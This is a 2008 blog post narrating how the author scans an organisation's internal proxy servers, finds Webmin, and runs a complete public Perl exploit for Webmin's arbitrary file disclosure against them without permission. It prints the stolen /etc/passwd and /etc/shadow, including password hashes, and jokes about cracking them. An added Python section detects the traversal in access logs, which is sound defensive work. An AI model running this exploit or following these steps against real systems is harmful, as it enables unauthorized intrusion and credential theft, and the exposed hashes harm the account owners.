Sunday, January 27, 2008

IDLY PEEKING AROUND WITH THE WEBMIN ARBITRARY REMOTE FILE DISCLOSURE

By thesims
Published: January 13, 2008

Hmm, a morning like any other … off to the office on my motorbike; that bike is three years of struggle before I could get a job at a company, even if I'm only an outsourced contractor. That's my routine, huh. It's a holiday but I'm in, since I happened to draw the morning shift … At the office I tinker with a home-built server for fun, and it has turned out pretty useful, from stashing files to remoting into the network to MP3 streaming, rather than leaving the server idle. I switch on my PC and try to get online and aahhh, turns out the gateway is down. Annoying … just when I need to browse, and on top of that every connection has dropped … Idly I run a traceroute, and it turns out the problem isn't at the gateway server's hop but in the routing outward, i.e. on the public IP side. I remember clearly that this uses a Cisco router … ahh, I'll leave that layer 3 problem alone for now and turn to layer 7 first…
Out of ideas, I keep thinking and thinking, what is it, something feels off … ohh yeah!!! like a neon light switching on in my head: a friend once told me, "Bal, just use proxy.sibiru.co.id" ..
Hmm, just for fun I want to know where that proxy resolves to ….

Here's the result

[iqbal@boc ~]$ dig proxies.sibiru.co.id

; <<>> DiG 9.3.3rc2 <<>> proxies.sibiru.co.id
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6317
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 4, ADDITIONAL: 3

;; QUESTION SECTION:
;proxies.sibiru.co.id. IN A

;; ANSWER SECTION:
proxies.sibiru.co.id. 384 IN A 10.1.10.19
proxies.sibiru.co.id. 384 IN A 10.1.10.17
proxies.sibiru.co.id. 384 IN A 10.1.10.18

;; AUTHORITY SECTION:
sibiru.co.id. 384 IN NS ns.sibiru.co.id.
sibiru.co.id. 384 IN NS ns0.sibiru.co.id.
sibiru.co.id. 384 IN NS ldap.sibiru.co.id.
sibiru.co.id. 384 IN NS pusren01.risti.sibiru.co.id.

;; ADDITIONAL SECTION:
ns.sibiru.co.id. 384 IN A 10.2.1.5
ns0.sibiru.co.id. 384 IN A 10.2.12.12
ldap.sibiru.co.id. 384 IN A 10.1.2.38

;; Query time: 3 msec
;; SERVER: 10.11.15.220#53(10.11.15.220)
;; WHEN: Sun Jan 13 20:57:32 2008
;; MSG SIZE rcvd: 217


Now look at the part printed in bold (the three A records) …. There are 3 servers here, so let me ping them first to see which ones reply

[iqbal@boc ~]$ ping 10.1.10.19
PING 10.1.10.19 (10.1.10.19) 56(84) bytes of data.
64 bytes from 10.1.10.19: icmp_seq=1 ttl=60 time=26.1 ms
64 bytes from 10.1.10.19: icmp_seq=2 ttl=60 time=25.4 ms
64 bytes from 10.1.10.19: icmp_seq=3 ttl=60 time=25.9 ms
64 bytes from 10.1.10.19: icmp_seq=4 ttl=60 time=25.7 ms
64 bytes from 10.1.10.19: icmp_seq=5 ttl=60 time=25.3 ms
64 bytes from 10.1.10.19: icmp_seq=6 ttl=60 time=25.5 ms

--- 10.1.10.19 ping statistics ---
6 packets transmitted, 6 received, 0% packet loss, time 5000ms
rtt min/avg/max/mdev = 25.383/25.711/26.199/0.291 ms
[iqbal@boc ~]$ ping 10.1.10.17
PING 10.1.10.17 (10.1.10.17) 56(84) bytes of data.
64 bytes from 10.1.10.17: icmp_seq=1 ttl=60 time=25.4 ms
64 bytes from 10.1.10.17: icmp_seq=2 ttl=60 time=26.6 ms
64 bytes from 10.1.10.17: icmp_seq=3 ttl=60 time=25.4 ms
64 bytes from 10.1.10.17: icmp_seq=4 ttl=60 time=25.5 ms
64 bytes from 10.1.10.17: icmp_seq=5 ttl=60 time=25.1 ms

--- 10.1.10.17 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 3998ms
rtt min/avg/max/mdev = 25.160/25.677/26.693/0.565 ms
[iqbal@boc ~]$ ping 10.1.10.18
PING 10.1.10.18 (10.1.10.18) 56(84) bytes of data.
64 bytes from 10.1.10.18: icmp_seq=1 ttl=60 time=25.6 ms
64 bytes from 10.1.10.18: icmp_seq=2 ttl=60 time=25.7 ms
64 bytes from 10.1.10.18: icmp_seq=3 ttl=60 time=25.2 ms
64 bytes from 10.1.10.18: icmp_seq=4 ttl=60 time=25.7 ms
64 bytes from 10.1.10.18: icmp_seq=5 ttl=60 time=25.4 ms
64 bytes from 10.1.10.18: icmp_seq=6 ttl=60 time=25.4 ms

--- 10.1.10.18 ping statistics ---
6 packets transmitted, 6 received, 0% packet loss, time 5000ms
rtt min/avg/max/mdev = 25.298/25.565/25.760/0.218 ms


Wow, cool … they all reply, so this is the proxy; now I just need to find the proxy port. Here's the port scan I ran

[iqbal@boc ~]$ nmap 10.1.10.17-19

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2008-01-13 21:06 WIT
Interesting ports on 10.1.10.17:
Not shown: 1673 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
6000/tcp filtered X11
8080/tcp open http-proxy
8443/tcp open https-alt
10000/tcp open snet-sensor-mgmt

Interesting ports on 10.1.10.18:
Not shown: 1672 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
654/tcp open unknown
669/tcp open unknown
744/tcp open flexlm
6000/tcp open X11
8080/tcp open http-proxy
10000/tcp open snet-sensor-mgmt

Interesting ports on 10.1.10.19:
Not shown: 1671 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
111/tcp open rpcbind
698/tcp open unknown
713/tcp open unknown
841/tcp open unknown
6000/tcp open X11
8080/tcp open http-proxy
10000/tcp open snet-sensor-mgmt

Nmap finished: 3 IP addresses (3 hosts up) scanned in 29.547 seconds

Now my head is filling with even more question marks; it looks like 10000 is for Webmin, and I was only looking for a proxy… Well, might as well find out whether that server has a hole too. After some digging I found it on the website http://www.milw0rm.com/exploits/2017; I copy-pasted it into a file webmin.pl. Here's the Webmin exploit


[iqbal@boc expl]$ cat webmin.pl
#!/usr/bin/perl
# Exploit for WEBMIN and USERMIN less than 1.29x
# ARBITARY REMOTE FILE DISCLOSURE
# WORKS FOR HTTP AND HTTPS (NOW)
# Thrusday 13th July 2006
# Vulnerability Disclosure at securitydot.net
# Coded by UmZ! umz32.dll@gmail.com
#
# Make sure you have LWP before using this exploit.
# USE IT AT YOUR OWN RISK
#
# GREETS to wiseguy, Anonymous Individual, Uquali......Jhant... Fakhru... etc........................
# for other.. like AHMED n FAIZ ... (GET A LIFE MAN).
#
# Revised on Friday 14th July 2006
use strict;
use warnings;
use LWP::Simple;
use LWP::UserAgent;
use HTTP::Request;

my $userag = LWP::UserAgent->new;

if (@ARGV < 4) {
    print("Usage: $0 <target> <port> <filename> <target type>\n");
    print("TARGETS are\n");
    print("0 - > HTTP\n");
    print("1 - > HTTPS\n");
    print("Define full path with file name\n");
    print("Example: ./webmin.pl blah.com 10000 /etc/passwd 0\n");
    exit(1);
}

my ($target, $port, $filename, $tar) = @ARGV;

print("WEBMIN EXPLOIT !!!!! coded by UmZ!\n");
print("Comments and Suggestions are welcome at umz32.dll [at] gmail.com\n");
print("Vulnerability disclose at securitydot.net\n");
print("I am just coding it in perl 'cuz I hate PHP!\n");
print("Attacking $target on port $port!\n");
print("FILENAME: $filename\n");

# 40 "/..%01" segments: the affected MiniServ removed "../" before it stripped
# non-printable bytes, so "..%01" survives the filter and then collapses to "..".
my $temp = "/..%01" x 40;

if ($tar eq '0') {
    my $url = "http://" . $target . ":" . $port . "/unauthenticated/" . $temp . $filename;
    my $content = get($url);

    if (defined $content) {
        print("FILE CONTENT STARTED\n");
        print("-----------------------------------\n");
        print($content);
        print("-------------------------------------\n");
    } else {
        print("Failed: could not fetch $url\n");
    }
}
elsif ($tar eq '1') {
    my $url = "https://" . $target . ":" . $port . "/unauthenticated/" . $temp . $filename;
    my $req = HTTP::Request->new(GET => $url);
    my $res = $userag->request($req);
    if ($res->is_success) {
        print("FILE CONTENT STARTED\n");
        print("-------------------------------------------\n");
        print $res->as_string;
        print("-------------------------------------------\n");
    } else {
        print "Failed: ", $res->status_line, "\n";
    }
}

# milw0rm.com [2006-07-15]

[iqbal@boc expl]$ perl webmin.pl 10.1.10.18 10000 /etc/shadow 1
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 10.1.10.18 on port 10000!
FILENAME: /etc/shadow
Failed: 404 File not found

That one failed

[iqbal@boc expl]$ perl webmin.pl 10.1.10.19 10000 /etc/shadow 1
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 10.1.10.19 on port 10000!
FILENAME: /etc/shadow
Failed: 404 File not found

The result above failed too

[iqbal@boc expl]$ perl webmin.pl 10.1.10.17 10000 /etc/passwd 1
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 10.1.10.17 on port 10000!
FILENAME: /etc/passwd
FILE CONTENT STARTED
-------------------------------------------
HTTP/1.0 200 Document follows
Connection: close
Date: Fri, 11 Jan 2008 06:42:31 GMT
Server: MiniServ/0.01
Content-Length: 1190
Content-Type: text/plain
Last-Modified: Tue, 20 Jun 2006 08:38:14 GMT
Client-Date: Fri, 11 Jan 2008 03:13:02 GMT
Client-Peer: 10.1.10.17:10000
Client-Response-Num: 1
Client-SSL-Cert-Issuer: /O=Webmin Webserver on localhost/CN=*/emailAddress=root@localhost
Client-SSL-Cert-Subject: /O=Webmin Webserver on localhost/CN=*/emailAddress=root@localhost
Client-SSL-Cipher: AES256-SHA
Client-SSL-Warning: Peer certificate not verified

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/sbin:/bin/sh
adm:x:3:4:adm:/var/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/bin/sh
news:x:9:13:news:/var/spool/news:/bin/sh
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
nobody:x:65534:65534:Nobody:/:/bin/sh
rpm:x:13:101:system user for rpm:/var/lib/rpm:/bin/false
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:70:70:system user for portmap:/:/bin/false
xfs:x:71:71:system user for XFree86:/etc/X11/fs:/bin/false
postfix:x:72:72:system user for postfix:/var/spool/postfix:/bin/false
rpcuser:x:73:73:system user for nfs-utils:/var/lib/nfs:/bin/false
squid:x:74:74:system user for squid:/var/spool/squid:/bin/false
sshd:x:75:75:system user for openssh:/var/empty:/bin/true
admin:x:501:501:admin:/home/admin:/bin/bash
apache:x:76:76:system user for apache2:/var/www:/bin/sh
mysql:x:77:77:system user for MySQL:/var/lib/mysql:/bin/bash
iscan:x:503:503::/:/bin/false
bowo:x:505:505::/home/bowo:/bin/bash
bayu:x:506:506:Ariya Bayu:/home/bayu:/bin/bash

Wow, it went through ……… I got you …………..

[iqbal@boc expl]$ perl webmin.pl 10.1.10.17 10000 /etc/shadow 1
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 10.1.10.17 on port 10000!
FILENAME: /etc/shadow
FILE CONTENT STARTED
-------------------------------------------
HTTP/1.0 200 Document follows
Connection: close
Date: Fri, 11 Jan 2008 06:43:22 GMT
Server: MiniServ/0.01
Content-Length: 800
Content-Type: text/plain
Last-Modified: Sun, 25 Jun 2006 15:03:50 GMT
Client-Date: Fri, 11 Jan 2008 03:13:51 GMT
Client-Peer: 10.1.10.17:10000
Client-Response-Num: 1
Client-SSL-Cert-Issuer: /O=Webmin Webserver on localhost/CN=*/emailAddress=root@localhost
Client-SSL-Cert-Subject: /O=Webmin Webserver on localhost/CN=*/emailAddress=root@localhost
Client-SSL-Cipher: AES256-SHA
Client-SSL-Warning: Peer certificate not verified

root:$1$0R.FZtLM$WlBgN6.5NKBN7OafXgqNQ/:12887:0:99999:7:::
bin:*:12515:0:99999:7:::
daemon:*:12515:0:99999:7:::
adm:*:12515:0:99999:7:::
lp:*:12515:0:99999:7:::
sync:*:12515:0:99999:7:::
shutdown:*:12515:0:99999:7:::
halt:*:12515:0:99999:7:::
mail:*:12515:0:99999:7:::
news:*:12515:0:99999:7:::
uucp:*:12515:0:99999:7:::
nobody:*:12515:0:99999:7:::
rpm:!!:12515:0:99999:7:::
vcsa:!!:12515:0:99999:7:::
rpc:!!:12515:0:99999:7:::
xfs:!!:12515:0:99999:7:::
postfix:!!:12515:0:99999:7:::
rpcuser:!!:12515:0:99999:7:::
squid:!!:12515:0:99999:7:::
sshd:!!:12515:0:99999:7:::
admin:$1$lUbNGfKl$4/v4BWtT5bHGD.VDHa6cN/:12887:0:99999:7:::
apache:!!:12515:0:99999:7:::
mysql:!!:12515:0:99999:7:::
iscan:!!:12516:0:99999:7:::
bowo:$1$1I4B/3.T$tmnE.Za1kqrM5y8QGLYmS.:12550:0:99999:7:::
bayu:!!:12848:0:99999:7:::


So 10.1.10.17 really does have a hole in Webmin … I can peek at /etc/passwd and /etc/shadow … hmm, I started out looking for a proxy and ended up with this. Oh well, I just copy-pasted that /etc/passwd and /etc/shadow… it might come in handy some day … and it was nice to be able to peek … The next day I reported this issue to the owner, and it actually got a reply …. even though it could have been worked over with John the Ripper, or by looking in slocate.db (to find *.conf files with plaintext passwords) hihiihhi
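As an added example that is not part of the original post: the /..%01 sequences in the script above slip past a "../" filter that runs before non-printable bytes are stripped, so a defender should normalize a request path the same way (percent-decode, then drop control characters) before deciding whether it climbs above the document root. The Python below applies that check over a few constructed CLF-style access log lines (the addresses, timestamps and log layout are made up for illustration, not taken from the post or from Webmin's own log format).

```python
import re
from urllib.parse import unquote

# Constructed CLF-style access log lines (illustrative, not from the original post).
SAMPLE_LOG = """\
10.11.15.5 - - [11/Jan/2008:03:13:02 +0700] "GET /unauthenticated/..%01/..%01/..%01/etc/passwd HTTP/1.0" 200 1190
10.11.15.5 - - [11/Jan/2008:03:13:51 +0700] "GET /unauthenticated/..%01/..%01/etc/shadow HTTP/1.0" 200 800
10.11.15.7 - - [11/Jan/2008:03:14:10 +0700] "GET /unauthenticated/style.css HTTP/1.0" 200 2104
10.11.15.9 - - [11/Jan/2008:03:15:00 +0700] "GET /session_login.cgi HTTP/1.0" 200 3300
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")

def normalize(path: str) -> str:
    """Percent-decode, then drop control bytes: the order that turns '..%01'
    into a plain '..' segment on the affected MiniServ versions."""
    return CONTROL_CHARS.sub("", unquote(path))

def escapes_root(path: str) -> bool:
    """True if the normalized path ever steps above the document root."""
    depth = 0
    for segment in normalize(path).split("/"):
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        elif segment and segment != ".":
            depth += 1
    return False

def scan_log(text: str) -> list:
    """One record per request that escapes the root, noting whether it came
    through Webmin's /unauthenticated/ handler (reachable without a login)."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if match and escapes_root(match.group("path")):
            path = match.group("path")
            hits.append({"client": line.split(" ", 1)[0], "raw_path": path,
                         "decoded_path": normalize(path),
                         "unauthenticated": path.startswith("/unauthenticated/")})
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['client']} traversal {hit['raw_path']} -> {hit['decoded_path']}")
```

A literal search for "../" in the raw log would miss both flagged lines, which is exactly why the normalization step comes before the check.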

Thanks to: Allah SWT …, Cyberlog: sorry I could only send an article now, even if it's just this one; I pray your wife stays healthy …, AdhietSlank: how's your girl, you're getting married, right? hurry up and get married, k1nk0n9: still busy with the new job, eh, so where's the celebration dinner …, Fl3xu5: still busy with college, eh … keep studying boss, don't give up, Sukam: where are you, when do we meet again …, Ariee & Rini: thanks for the support, may your child grow up to be useful, sorry I haven't had a chance to meet the little one yet, and Ariee, a BTS versus your body, your body's heavier heheheh … A-technique: sorry bro, I haven't had a chance to get back to Depok … let's just chat on YM hehehe, Jantap: hehehe the field manager: this guy knows a lot about BTS calculations, keep on succeeding … Letjen: law school with computers as just a hobby, so now I've got myself a lawyer … free of charge, yeah … success to everyone, ibnu: send me a pyramid, and the sphinx too yaaaaaa …….., z3r0byt3: how are you sir, still teaching in Bekasi? when can I come over to your place for some enlightenment, office mates at BOC: let's handle it okay, regards, TheSimS aka Iqbal@sekuritionline.net


NB:

Apologies if any party is harmed by this; the purpose is learning, not taking advantage of a weakness in a system, and it is not meant to bring anyone down. And admins, be diligent about patching your systems; that Webmin has a hole.
